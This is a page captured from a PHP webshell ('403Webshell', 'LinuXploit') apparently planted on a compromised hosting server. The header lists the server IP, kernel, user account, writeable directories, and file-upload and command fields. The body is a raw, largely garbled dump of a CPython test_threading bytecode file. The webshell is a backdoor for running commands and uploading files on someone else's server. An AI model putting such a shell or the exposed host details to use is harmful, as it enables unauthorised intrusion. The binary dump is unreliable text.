403Webshell
Server IP : 118.27.122.248  /  Your IP : 216.73.217.5
Web Server : Apache
System : Linux web0264.sh.tyo1 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
User : c9415830 ( 11735)
PHP Version : 8.4.17
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/alt/python36/lib64/python3.6/test/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/alt/python36/lib64/python3.6/test/__pycache__/test_threading.cpython-36.pyc
3

x2_O��@s�dZddlZddlmZmZmZmZddlmZm	Z	ddl
Z
ddlZed�Zed�Z
ddlZddlZddlZddlZddlZddlmZddlmZd4ZGdd�de�ZGdd�de
j�ZGdd�dej�ZGdd�de�ZGdd�de�ZGdd�de�ZGdd�de�ZGdd�de�Z Gdd�dej!�Z!Gd d!�d!ej"�Z#ej$e
j%dkd"�Gd#d$�d$ej"��Z&Gd%d&�d&ej'�Z'Gd'd(�d(ej"�Z(Gd)d*�d*ej)�Z)Gd+d,�d,ej*�Z*Gd-d.�d.ej+�Z+Gd/d0�d0ej,�Z,Gd1d2�d2ej�Z-e.d3k�r�ej/�dS)5z!
Tests for the threading module.
�N)�verbose�
import_module�cpython_only�requires_type_collecting)�assert_python_ok�assert_python_failure�_thread�	threading)�
lock_tests)�support�freebsd4�freebsd5�freebsd6�netbsd5�hp-ux11c@s,eZdZdd�Zdd�Zdd�Zdd�Zd	S)
�CountercCs
d|_dS)Nr)�value)�self�r�8/opt/alt/python36/lib64/python3.6/test/test_threading.py�__init__"szCounter.__init__cCs|jd7_dS)N�)r)rrrr�inc$szCounter.inccCs|jd8_dS)Nr)r)rrrr�dec&szCounter.deccCs|jS)N)r)rrrr�get(szCounter.getN)�__name__�
__module__�__qualname__rrrrrrrrr!src@seZdZdd�Zdd�ZdS)�
TestThreadcCs,tjj||d�||_||_||_||_dS)N)�name)r	�Threadr�testcase�sema�mutex�nrunning)rrr!r"r#r$rrrr,s
zTestThread.__init__cCs�tj�d}tr&td|j|df�|j��|j�8|jj�trTt|jj�d�|j	j
|jj�d�WdQRXtj|�tr�td|jd�|j�@|jj
�|j	j|jj�d�tr�td	|j|jj�f�WdQRXWdQRXdS)
Ng��@ztask %s will run for %.1f usecg��.Aztasks are running�Ztask�donerz$%s is finished. %d tasks are running)�randomr�printrr"r#r$rrr!ZassertLessEqual�time�sleeprZassertGreaterEqual)rZdelayrrr�run3s&


zTestThread.runN)rrrrr+rrrrr+src@seZdZdd�Zdd�ZdS)�BaseTestCasecCstjj�|_dS)N)�testrZthreading_setup�_threads)rrrr�setUpMszBaseTestCase.setUpcCstjj|j�tjj�dS)N)r-rZthreading_cleanupr.Z
reap_children)rrrr�tearDownPszBaseTestCase.tearDownN)rrrr/r0rrrrr,Lsr,c@sZeZdZdd�Zdd�Zdd�Zdd�Zd	d
�Zdd�Zd
d�Z	dd�Z
dd�Zdd�Zdd�Z
dd�Zdd�Zdd�Zdd�Zejeed�d �d!d"��Zejeed�d#�d$d%��Zd&d'�Zejeed�d(�ejeed)�d*�d+d,���Zejejekd-�ejeed�d(�ejeed)�d*�d.d/����Zed0d1��Z d2d3�Z!d4d5�Z"d6d7�Z#e$d8d9��Z%d:S);�ThreadTestscCs�d}tjdd�}tj�}t�}g}xRt|�D]F}td|||||�}|j|�|j|j�|j	t
|�d�|j�q,Wtr�t
d�xL|D]D}|j�|j|j��|j|jd�|j|j�|j	t
|�d�q�Wtr�t
d	�|j|j�d�dS)
N�
r%)rz<thread %d>z^<TestThread\(.*, initial\)>$z!waiting for all tasks to completerz#^<TestThread\(.*, stopped -?\d+\)>$zall tasks done)r	�BoundedSemaphore�RLockr�ranger�append�assertIsNone�ident�assertRegex�repr�startrr(�join�assertFalse�is_alive�assertNotEqual�assertIsNotNone�assertEqualr)rZNUMTASKSr"r#Z
numrunning�threads�i�trrr�test_various_opsYs,

zThreadTests.test_various_opsc
sr|jtj�j���fdd�}tj��g�tj��*tj|f�}�j	�|j
�d|�WdQRXtj�d=dS)Ncs�jtj�j��j�dS)N)r6r	�
currentThreadr8�setr)r&r8rr�f{sz9ThreadTests.test_ident_of_no_threading_threads.<locals>.fr)r@r	rFr8�Eventr�wait_threads_exitr�start_new_thread�waitrA�_active)rrH�tidr)r&r8r�"test_ident_of_no_threading_threadsxs
z.ThreadTests.test_ident_of_no_threading_threadscCsRtrtd�ytjd�Wn tjk
r:tjd��YnX|j�tjd�dS)Nzwith 256kB thread stack size...iz4platform does not support changing thread stack sizer)	rr(r	�
stack_sizer�error�unittest�SkipTestrE)rrrr�test_various_ops_small_stack�sz(ThreadTests.test_various_ops_small_stackcCsRtrtd�ytjd�Wn tjk
r:tjd��YnX|j�tjd�dS)Nzwith 1MB thread stack size...iz4platform does not support changing thread stack sizer)	rr(r	rPrrQrRrSrE)rrrr�test_various_ops_large_stack�sz(ThreadTests.test_various_ops_large_stackcCs�dd�}tj�}|j�tj��tj||f�}|j�WdQRX|j|tj�|j	tj|tj
�|jtj|j��|j
ttj|�d�tj|=dS)NcSstj�|j�dS)N)r	�current_thread�release)r#rrrrH�sz*ThreadTests.test_foreign_thread.<locals>.f�_DummyThread)r	�Lock�acquirerrJrrK�assertInrM�assertIsInstancerX�
assertTruer>r9r:)rrHr#rNrrr�test_foreign_thread�s
zThreadTests.test_foreign_threadc	s�td�}|jj}Gdd�dt��|j��}tj�}y||j|�|�}xqFWWn�k
r`YnX|jd�y|j	|d�Wnt
k
r�YnXtj��tj��G���fdd�dtj�}|�}d|_
|j�tr�td	�tr�td
�||jd�|�}|j	|d�t�rtd��j�}|j|�t�r2td
�|j|j�t�rLtd�||j|j�|�}|j	|d�t�rxtd��jdd�|j|j�t�r�td�|j�r�|j�dS)N�ctypesc@seZdZdS)z<ThreadTests.test_PyThreadState_SetAsyncExc.<locals>.AsyncExcN)rrrrrrr�AsyncExc�sr`zAsyncExc not raisedrcseZdZ���fdd�ZdS)z:ThreadTests.test_PyThreadState_SetAsyncExc.<locals>.WorkercsTtj�|_d|_yx�j�tjd�qWWn"�k
rNd|_�j�YnXdS)NFg�������?T)r	�	get_ident�id�finishedrGr)r*)r)r`�worker_saw_exception�worker_startedrrr+�s
z>ThreadTests.test_PyThreadState_SetAsyncExc.<locals>.Worker.runN)rrrr+r)r`rdrerr�Worker�srfTz    started worker threadz     trying nonsensical thread idrz,    waiting for worker thread to get startedz"    verifying worker hasn't exitedz2    attempting to raise asynch exception in workerz5    waiting for worker to say it caught the exceptionr2)�timeoutz    all OK -- joining worker���)rZ	pythonapiZPyThreadState_SetAsyncExc�	ExceptionZ	py_objectr	raZc_longZfailrA�UnboundLocalErrorrIr �daemonr;rr(rLr]r=rcrbr<)	rr_Z
set_async_excZ	exceptionrN�resultrfrD�retr)r`rdrer�test_PyThreadState_SetAsyncExc�s^



z*ThreadTests.test_PyThreadState_SetAsyncExccCsXdd�}tj}|t_z6tjdd�d�}|jtj|j�|j|tjkd�Wd|t_XdS)NcWstj��dS)N)r	�ThreadError)�argsrrr�fail_new_thread
sz7ThreadTests.test_limbo_cleanup.<locals>.fail_new_threadcSsdS)Nrrrrr�<lambda>sz0ThreadTests.test_limbo_cleanup.<locals>.<lambda>)�targetz:Failed to cleanup _limbo map on failure of Thread.start().)r	�_start_new_threadr �assertRaisesror;r=Z_limbo)rrqrtrDrrr�test_limbo_cleanups
zThreadTests.test_limbo_cleanupcCs(td�tdd�\}}}|j|d�dS)Nr_z-caNif 1:
            import ctypes, sys, time, _thread

            # This lock is used as a simple event variable.
            ready = _thread.allocate_lock()
            ready.acquire()

            # Module globals are cleared before __del__ is run
            # So we save the functions in class dict
            class C:
                ensure = ctypes.pythonapi.PyGILState_Ensure
                release = ctypes.pythonapi.PyGILState_Release
                def __del__(self):
                    state = self.ensure()
                    self.release(state)

            def waitingThread():
                x = C()
                ready.release()
                time.sleep(100)

            _thread.start_new_thread(waitingThread, ())
            ready.acquire()  # Be sure the other thread is waiting.
            sys.exit(42)
            �*)rrrA)r�rc�out�errrrr�test_finalize_runnning_threadsz)ThreadTests.test_finalize_runnning_threadcCstdd�dS)Nz-caPif 1:
            import sys, threading

            # A deadlock-killer, to prevent the
            # testsuite to hang forever
            def killer():
                import os, time
                time.sleep(2)
                print('program blocked; aborting')
                os._exit(2)
            t = threading.Thread(target=killer)
            t.daemon = True
            t.start()

            # This is the trace function
            def func(frame, event, arg):
                threading.current_thread()
                return func

            sys.settrace(func)
            )r)rrrr�test_finalize_with_trace;sz$ThreadTests.test_finalize_with_tracecCs0tdd�\}}}|j|j�d�|j|d�dS)Nz-ca�if 1:
                import threading
                from time import sleep

                def child():
                    sleep(1)
                    # As a non-daemon thread we SHOULD wake up and nothing
                    # should be torn down yet
                    print("Woke up, sleep function is:", sleep)

                threading.Thread(target=child).start()
                raise SystemExit
            s5Woke up, sleep function is: <built-in function sleep>�)rrA�strip)rrxryrzrrr�test_join_nondaemon_on_shutdownTs

z+ThreadTests.test_join_nondaemon_on_shutdownc
Cs�tj}tj�}zbx\tdd�D]N}tj|d�tjdd�d�}|j�|j�|�}|j	||d||f�qWWdtj|�XdS)Nr�dg-C��6*?cSsdS)Nrrrrrrrpsz7ThreadTests.test_enumerate_after_join.<locals>.<lambda>)rsz&#1703448 triggered after %d trials: %s)
r	�	enumerate�sys�getswitchintervalr5�setswitchintervalr r;r<�assertNotIn)r�enum�old_intervalrCrD�lrrr�test_enumerate_after_joinhsz%ThreadTests.test_enumerate_after_joincCs�Gdd�dt�}|dd�}tj|�}|jj�~|j|�dtj|��d�|dd�}tj|�}|jj�~|j|�dtj|��d�dS)Nc@seZdZdd�Zdd�ZdS)zDThreadTests.test_no_refcycle_through_target.<locals>.RunSelfFunctioncSs.||_tj|j|fd|id�|_|jj�dS)N�yet_another)rsrp�kwargs)�should_raiser	r �_run�threadr;)rr�rrrr{s
zMThreadTests.test_no_refcycle_through_target.<locals>.RunSelfFunction.__init__cSs|jr
t�dS)N)r��
SystemExit)rZ	other_refr�rrrr��szIThreadTests.test_no_refcycle_through_target.<locals>.RunSelfFunction._runN)rrrrr�rrrr�RunSelfFunctionzs	r�F)r�z%d references still around)�msgT)�object�weakref�refr�r<r7r��getrefcount)rr�Z
cyclic_objectZweak_cyclic_objectZraising_cyclic_objectZweak_raising_cyclic_objectrrr�test_no_refcycle_through_targetys





z+ThreadTests.test_no_refcycle_through_targetcCsPtj�}|j�|jd�|j�|jd�|j�tj�}|j�tj	�dS)NTr)
r	r ZisDaemonZ	setDaemonZgetNameZsetNameZisAliverIZisSet�activeCount)rrD�errr�test_old_threading_api�s

z"ThreadTests.test_old_threading_apicCs2tj�}|jdt|��d|_|jdt|��dS)NrkT)r	r r�r:rkr[)rrDrrr�test_repr_daemon�szThreadTests.test_repr_daemoncCsHtj�}|j|j�tjdd�}|j|j�tjdd�}|j|j�dS)NF)rkT)r	r r=rkr])rrDrrr�test_deamon_param�szThreadTests.test_deamon_param�forkztest needs fork()cCs0d}td|�\}}}|j|d�|j|d�dS)Na�if 1:
            import _thread, threading, os, time

            def background_thread(evt):
                # Creates and registers the _DummyThread instance
                threading.current_thread()
                evt.set()
                time.sleep(10)

            evt = threading.Event()
            _thread.start_new_thread(background_thread, (evt,))
            evt.wait()
            assert threading.active_count() == 2, threading.active_count()
            if os.fork() == 0:
                assert threading.active_count() == 1, threading.active_count()
                os._exit(0)
            else:
                os.wait()
        z-cr})rrA)r�code�_ryrzrrr�test_dummy_thread_after_fork�sz(ThreadTests.test_dummy_thread_after_forkzneeds os.fork()cCs�tj�}|jtj|�tjjd�x�td�D]~}tjdd�d�}|j	�t
j�}|dkrpt
j|j
�rhdnd�q,|j�t
j|d�\}}|jt
j|��|jdt
j|��q,WdS)	Ng���ư>�cSsdS)Nrrrrrrr�sz6ThreadTests.test_is_alive_after_fork.<locals>.<lambda>)rsr�r2)r�r��
addCleanupr�r-rr5r	r r;�osr��_exitr>r<�waitpidr]�	WIFEXITEDrA�WEXITSTATUS)rr�rCrD�pid�statusrrr�test_is_alive_after_fork�sz$ThreadTests.test_is_alive_after_forkcshtj�}�j|jd��j|jtj�j��j|jtj���fdd�}tj|d�}|j�|j	�dS)NZ
MainThreadcs�jtj�jtj�j�dS)N)r?r	�main_threadr8rVr)rrrrH�sz'ThreadTests.test_main_thread.<locals>.f)rs)
r	r�rArr8rVrar r;r<)r�mainrHZthr)rr�test_main_thread�szThreadTests.test_main_threadztest needs os.fork()r�ztest needs os.waitpid()cCs@d}td|�\}}}|j�jdd�}|j|d�|j|d�dS)Nakif 1:
            import os, threading

            pid = os.fork()
            if pid == 0:
                main = threading.main_thread()
                print(main.name)
                print(main.ident == threading.current_thread().ident)
                print(main.ident == threading.get_ident())
            else:
                os.waitpid(pid, 0)
        z-c�
�r}zMainThread
True
True
)r�decode�replacerA)rr�r�ryrz�datarrr�test_main_thread_after_fork�s
z'ThreadTests.test_main_thread_after_forkzdue to known OS bugcCs@d}td|�\}}}|j�jdd�}|j|d�|j|d�dS)Na�if 1:
            import os, threading, sys

            def f():
                pid = os.fork()
                if pid == 0:
                    main = threading.main_thread()
                    print(main.name)
                    print(main.ident == threading.current_thread().ident)
                    print(main.ident == threading.get_ident())
                    # stdout is fully buffered because not a tty,
                    # we have to flush before exit.
                    sys.stdout.flush()
                else:
                    os.waitpid(pid, 0)

            th = threading.Thread(target=f)
            th.start()
            th.join()
        z-cr�r�r}zThread-1
True
True
)rr�r�rA)rr�r�ryrzr�rrr�/test_main_thread_after_fork_from_nonmain_threads
z;ThreadTests.test_main_thread_after_fork_from_nonmain_threadcCsBd}td|�\}}}|j�}|j|d�|j|j�dgd�dS)Na�if 1:
            import gc, threading

            main_thread = threading.current_thread()
            assert main_thread is threading.main_thread()  # sanity check

            class RefCycle:
                def __init__(self):
                    self.cycle = self

                def __del__(self):
                    print("GC:",
                          threading.current_thread() is main_thread,
                          threading.main_thread() is main_thread,
                          threading.enumerate() == [main_thread])

            RefCycle()
            gc.collect()  # sanity check
            x = RefCycle()
        z-cr}zGC: True True True�)rr�rA�
splitlines)rr�r�ryrzr�rrr� test_main_thread_during_shutdown#s
z,ThreadTests.test_main_thread_during_shutdowncs�tj��tj���j��j���fdd�}tj|d�}|j|jd�|j��j�|j|j	��|j}|j
|jdd�d��j�|j|jdd�d�|j|j	��|j�|j
|j	��|j|j�|j
�dS)Ncs�j��j�tjd�dS)Ng{�G�z�?)rWrZr)r*r)�finish�startedrrrHGsz'ThreadTests.test_tstate_lock.<locals>.f)rsr)rgF�)r�
allocate_lockrZr	r ZassertIsZ_tstate_lockr;r]r>r=rWr7r<)rrHrDZtstate_lockr)r�r�r�test_tstate_lockAs&zThreadTests.test_tstate_lockcs�tj��tj���j��j���fdd�}tj|d�}|j��j�|jdt|���j�d}x(t	d�D]}|t|�kr�Pt
jd�qpW|j|t|��|j�dS)Ncs�j��j�dS)N)rWrZr)r�r�rrrHjsz(ThreadTests.test_repr_stopped.<locals>.f)rsr�Zstoppedi�g{�G�z�?)
rr�rZr	r r;r[r:rWr5r)r*r<)rrHrDZLOOKING_FORrCr)r�r�r�test_repr_stoppedds"zThreadTests.test_repr_stoppedcs�x�tdd�D]�}tj|���fdd�t|�D�}x|D]}|j�q6Wx|D]}|j�qLW�fdd�t|�D�}x|D]}|j�qxWx|D]}|j�q�W|jt�j�qWdS)Nrr2csg|]}tj�jd��qS))rs)r	r rZ)�.0r�)�bsrr�
<listcomp>�sz;ThreadTests.test_BoundedSemaphore_limit.<locals>.<listcomp>csg|]}tj�jd��qS))rs)r	r rW)r�r�)r�rrr��s)r5r	r3r;r<ru�
ValueErrorrW)r�limitrBrDr)r�r�test_BoundedSemaphore_limits






z'ThreadTests.test_BoundedSemaphore_limitcs��fdd��dd����fdd��d�_tj�}tj��z8tj��ddl}|j��xtd�D]
}��qbWWdtj|�XdS)	Ncs�S)Nr)�frameZevent�arg)�
noop_tracerrr��sz9ThreadTests.test_frame_tstate_tracing.<locals>.noop_tracecssx
dVqWdS)N�	generatorrrrrrr��sz8ThreadTests.test_frame_tstate_tracing.<locals>.generatorcs�jdkr���_t�j�S)N)�gen�nextr)�callbackr�rrr��s
z7ThreadTests.test_frame_tstate_tracing.<locals>.callbackrr%)r�r��gettrace�settracer	�	_testcapiZcall_in_temporary_c_threadr5)rZ	old_tracer�r-r)r�r�r�r�test_frame_tstate_tracing�s


z%ThreadTests.test_frame_tstate_tracingN)&rrrrErOrTrUr^rnrvr{r|rr�r�r�r�r�rR�
skipUnless�hasattrr�r�r�r�r��skipIfr��platform�platforms_to_skipr�rr�r�r�r�rr�rrrrr1Us8U!

#r1c@s�eZdZdd�Zdd�Zejeed�d�ej	e
jekd�dd	���Z
ejeed�d�ej	e
jekd�d
d���Zej	e
jekd�dd
��Zejeed�d�ej	e
jekd�dd���Zejeed�d�dd��ZdS)�ThreadJoinOnShutdowncCs8d|}td|�\}}}|j�jdd�}|j|d�dS)Na�if 1:
            import sys, os, time, threading

            # a thread, which waits for the main program to terminate
            def joiningfunc(mainthread):
                mainthread.join()
                print('end of thread')
                # stdout is fully buffered because not a tty, we have to flush
                # before exit.
                sys.stdout.flush()
        
z-cr�r�zend of main
end of thread
)rr�r�rA)r�scriptrxryrzr�rrr�
_run_and_join�sz"ThreadJoinOnShutdown._run_and_joincCsd}|j|�dS)Nz�if 1:
            import os
            t = threading.Thread(target=joiningfunc,
                                 args=(threading.current_thread(),))
            t.start()
            time.sleep(0.1)
            print('end of main')
            )r�)rr�rrr�test_1_join_on_shutdown�s	z,ThreadJoinOnShutdown.test_1_join_on_shutdownr�zneeds os.fork()zdue to known OS bugcCsd}|j|�dS)NaGif 1:
            childpid = os.fork()
            if childpid != 0:
                os.waitpid(childpid, 0)
                sys.exit(0)

            t = threading.Thread(target=joiningfunc,
                                 args=(threading.current_thread(),))
            t.start()
            print('end of main')
            )r�)rr�rrr�test_2_join_in_forked_process�sz2ThreadJoinOnShutdown.test_2_join_in_forked_processcCsd}|j|�dS)Na:if 1:
            main_thread = threading.current_thread()
            def worker():
                childpid = os.fork()
                if childpid != 0:
                    os.waitpid(childpid, 0)
                    sys.exit(0)

                t = threading.Thread(target=joiningfunc,
                                     args=(main_thread,))
                print('end of main')
                t.start()
                t.join() # Should not block: main_thread is already stopped

            w = threading.Thread(target=worker)
            w.start()
            )r�)rr�rrr�!test_3_join_in_forked_from_thread�sz6ThreadJoinOnShutdown.test_3_join_in_forked_from_threadcCs"d}td|�\}}}|j|�dS)Na�if True:
            import os
            import random
            import sys
            import time
            import threading

            thread_has_run = set()

            def random_io():
                '''Loop for a while sleeping random tiny amounts and doing some I/O.'''
                while True:
                    in_f = open(os.__file__, 'rb')
                    stuff = in_f.read(200)
                    null_f = open(os.devnull, 'wb')
                    null_f.write(stuff)
                    time.sleep(random.random() / 1995)
                    null_f.close()
                    in_f.close()
                    thread_has_run.add(threading.current_thread())

            def main():
                count = 0
                for _ in range(40):
                    new_thread = threading.Thread(target=random_io)
                    new_thread.daemon = True
                    new_thread.start()
                    count += 1
                while len(thread_has_run) < count:
                    time.sleep(0.001)
                # Trigger process shutdown
                sys.exit(0)

            main()
            z-c)rr=)rr�rxryrzrrr�test_4_daemon_threadss'z*ThreadJoinOnShutdown.test_4_daemon_threadscCsVdd�}g}x.td�D]"}tj|d�}|j|�|j�qWx|D]}|j�qBWdS)NcSs,tj�}|dkrtj|d�n
tjd�dS)Nr)r�r�r�r�)r�rrr�do_fork_and_wait4szIThreadJoinOnShutdown.test_reinit_tls_after_fork.<locals>.do_fork_and_wait�)rs)r5r	r r6r;r<)rr�rBrCrDrrr�test_reinit_tls_after_fork.s	

z/ThreadJoinOnShutdown.test_reinit_tls_after_forkcCs�g}x2td�D]&}tjdd�d�}|j|�|j�qWtj�}|dkrpttj	��dkrdtj
d�q�tj
d�ntj|d�\}}|jd|�x|D]}|j
�q�WdS)Nr�cSs
tjd�S)Ng333333�?)r)r*rrrrrrMszKThreadJoinOnShutdown.test_clear_threads_states_after_fork.<locals>.<lambda>)rsrr)r5r	r r6r;r�r��lenr��_current_framesr�r�rAr<)rrBrCrDr�r�r�rrr�$test_clear_threads_states_after_forkFs

z9ThreadJoinOnShutdown.test_clear_threads_states_after_forkN)rrrr�r�rRr�r�r�r�r�r�r�r�r�r�r�r�rrrrr��s+r�c@s(eZdZdd�Zdd�Zedd��ZdS)�SubinterpThreadingTestscCsbtj�\}}|jtj|�|jtj|�d|f}tjj|�}|j|d�|jtj|d�d�dS)Na\if 1:
            import os
            import threading
            import time

            def f():
                # Sleep a bit so that the thread is still running when
                # Py_EndInterpreter is called.
                time.sleep(0.05)
                os.write(%d, b"x")
            threading.Thread(target=f).start()
            rr�x)	r��piper��closer-r�run_in_subinterprA�read)r�r�wr�rmrrr�test_threads_joinbs
z)SubinterpThreadingTests.test_threads_joincCsbtj�\}}|jtj|�|jtj|�d|f}tjj|�}|j|d�|jtj|d�d�dS)Naif 1:
            import os
            import threading
            import time

            class Sleeper:
                def __del__(self):
                    time.sleep(0.05)

            tls = threading.local()

            def f():
                # Sleep a bit so that the thread is still running when
                # Py_EndInterpreter is called.
                time.sleep(0.05)
                tls.x = Sleeper()
                os.write(%d, b"x")
            threading.Thread(target=f).start()
            rrr�)	r�r�r�r�r-rr�rAr�)rr�r�r�rmrrr�test_threads_join_2ys
z+SubinterpThreadingTests.test_threads_join_2c
CsHd}d|f}tjj��td|�\}}}WdQRX|jd|j��dS)NaAif 1:
            import os
            import threading
            import time

            def f():
                # Make sure the daemon thread is still running when
                # Py_EndInterpreter is called.
                time.sleep(10)
            threading.Thread(target=f, daemon=True).start()
            z[if 1:
            import _testcapi

            _testcapi.run_in_subinterp(%r)
            z-cz:Fatal Python error: Py_EndInterpreter: not the last thread)r-rZSuppressCrashReportrr[r�)rZsubinterp_coder�rxryrzrrr�test_daemon_threads_fatal_error�s
z7SubinterpThreadingTests.test_daemon_threads_fatal_errorN)rrrr�r�rr�rrrrr�`s r�c@s|eZdZdd�Zdd�Zdd�Zdd�Zd	d
�Zej	e
jdkoFej
j�d�d
d��Zdd�Zedd��Zdd�Zdd�ZdS)�ThreadingExceptionTestscCs*tj�}|j�|jt|j�|j�dS)N)r	r r;ru�RuntimeErrorr<)rr�rrr�test_start_thread_again�sz/ThreadingExceptionTests.test_start_thread_againcCstj�}|jt|j�dS)N)r	rVrur�r<)rrVrrr�test_joining_current_thread�sz3ThreadingExceptionTests.test_joining_current_threadcCstj�}|jt|j�dS)N)r	r rur�r<)rr�rrr�test_joining_inactive_thread�sz4ThreadingExceptionTests.test_joining_inactive_threadcCs.tj�}|j�|jtt|dd�|j�dS)NrkT)r	r r;rur��setattrr<)rr�rrr�test_daemonize_active_thread�sz4ThreadingExceptionTests.test_daemonize_active_threadcCstj�}|jt|j�dS)N)r	rYrur�rW)r�lockrrr�test_releasing_unacquired_lock�sz6ThreadingExceptionTests.test_releasing_unacquired_lock�darwinztest macosx problemcCshd}d}tjtjd|gtjtjd�}|j�\}}|j�jdd�}|j|j	dd|j��|j||�dS)	Naif True:
            import threading

            def recurse():
                return recurse()

            def outer():
                try:
                    recurse()
                except RecursionError:
                    pass

            w = threading.Thread(target=outer)
            w.start()
            w.join()
            print('end of main thread')
            zend of main thread
z-c)�stdout�stderrr�r�rzUnexpected error: )
�
subprocess�Popenr��
executable�PIPEZcommunicater�r�rA�
returncode)rr�Zexpected_output�pr�r�r�rrr�test_recursion_limit�sz,ThreadingExceptionTests.test_recursion_limitcCs\d}td|�\}}}|j|d�|j�}|jd|�|jd|�|jd|�|jd|�dS)Na�if True:
            import threading
            import time

            running = False
            def run():
                global running
                running = True
                while running:
                    time.sleep(0.01)
                1/0
            t = threading.Thread(target=run)
            t.start()
            while not running:
                time.sleep(0.01)
            running = False
            t.join()
            z-cr}zException in threadz"Traceback (most recent call last):�ZeroDivisionErrorzUnhandled exception)rrAr�r[r�)rr�rxryrzrrr�test_print_exception�sz,ThreadingExceptionTests.test_print_exceptioncCs\d}td|�\}}}|j|d�|j�}|jd|�|jd|�|jd|�|jd|�dS)Na�if True:
            import sys
            import threading
            import time

            running = False
            def run():
                global running
                running = True
                while running:
                    time.sleep(0.01)
                1/0
            t = threading.Thread(target=run)
            t.start()
            while not running:
                time.sleep(0.01)
            sys.stderr = None
            running = False
            t.join()
            z-cr}zException in threadz"Traceback (most recent call last):r�zUnhandled exception)rrAr�r[r�)rr�rxryrzrrr�%test_print_exception_stderr_is_none_1sz=ThreadingExceptionTests.test_print_exception_stderr_is_none_1cCs4d}td|�\}}}|j|d�|jd|j��dS)Na�if True:
            import sys
            import threading
            import time

            running = False
            def run():
                global running
                running = True
                while running:
                    time.sleep(0.01)
                1/0
            sys.stderr = None
            t = threading.Thread(target=run)
            t.start()
            while not running:
                time.sleep(0.01)
            running = False
            t.join()
            z-cr}zUnhandled exception)rrAr�r�)rr�rxryrzrrr�%test_print_exception_stderr_is_none_2&sz=ThreadingExceptionTests.test_print_exception_stderr_is_none_2csXdd��G�fdd�dtj�}|�}|j�|j�|j|j�|j|jt�d|_dS)NcSs�dS)Nrrrrr�
bare_raise@szOThreadingExceptionTests.test_bare_raise_in_brand_new_thread.<locals>.bare_raisecseZdZdZ�fdd�ZdS)zOThreadingExceptionTests.test_bare_raise_in_brand_new_thread.<locals>.Issue27558Ncs8y
��Wn(tk
r2}z||_WYdd}~XnXdS)N)ri�exc)rr)rrrr+Fs
zSThreadingExceptionTests.test_bare_raise_in_brand_new_thread.<locals>.Issue27558.run)rrrrr+r)rrr�
Issue27558Csr)r	r r;r<r@rr\r�)rrr�r)rr�#test_bare_raise_in_brand_new_thread?s	z;ThreadingExceptionTests.test_bare_raise_in_brand_new_threadN)rrrr�r�r�r�r�rRr�r�r�r-rZpython_is_optimizedr�rrrrrrrrrr��s r�c@s$eZdZdd�Zdd�Zdd�ZdS)�
TimerTestscCstj|�g|_tj�|_dS)N)r,r/�
callback_argsr	rI�callback_event)rrrrr/Vs
zTimerTests.setUpcCs�tjd|j�}|j�|jj�|jjd�d|jd<|jj	�tjd|j�}|j�|jj�|j
t|j�d�|j
|jfiffifg�|j
�|j
�dS)Ng{�G�z�?ZblahZbarZfoor�)r	ZTimer�
_callback_spyr;r	rLrpr6r��clearrAr�rr<)rZtimer1Ztimer2rrr� test_init_immutable_default_args[s



z+TimerTests.test_init_immutable_default_argscOs*|jj|dd�|j�f�|jj�dS)N)rr6�copyr	rG)rrpr�rrrr
lszTimerTests._callback_spyN)rrrr/rr
rrrrrTsrc@seZdZeej�ZdS)�	LockTestsN)rrr�staticmethodr	rY�locktyperrrrrpsrc@seZdZeej�ZdS)�PyRLockTestsN)rrrrr	Z_PyRLockrrrrrrssrzRLock not implemented in Cc@seZdZeej�ZdS)�CRLockTestsN)rrrrr	�_CRLockrrrrrrvsrc@seZdZeej�ZdS)�
EventTestsN)rrrrr	rIZ	eventtyperrrrrzsrc@seZdZeej�ZdS)�ConditionAsRLockTestsN)rrrrr	�	Conditionrrrrrr}src@seZdZeej�ZdS)�ConditionTestsN)rrrrr	rZcondtyperrrrr�src@seZdZeej�ZdS)�SemaphoreTestsN)rrrrr	Z	Semaphore�semtyperrrrr�src@seZdZeej�ZdS)�BoundedSemaphoreTestsN)rrrrr	r3rrrrrr�src@seZdZeej�ZdS)�BarrierTestsN)rrrrr	ZBarrierZbarriertyperrrrr�src@seZdZdd�ZdS)�MiscTestCasecCs&dh}ddh}tj|td||d�dS)NrorFr�r	r)�extra�	blacklist)r	r)rZcheck__all__r	)rrrrrr�test__all__�s
zMiscTestCase.test__all__N)rrrrrrrrr�sr�__main__)rr
rrr)0�__doc__Ztest.supportr-rrrrZtest.support.script_helperrrr'r�rr	r)rRr�r�r�r
rr�r�rr rZTestCaser,r1r�r�r�rrZ
RLockTestsrr�rrrrrrrrrrr�rrrr�<module>sV
!	i'Q$



Youez - 2016 - github.com/yon3zu
LinuXploit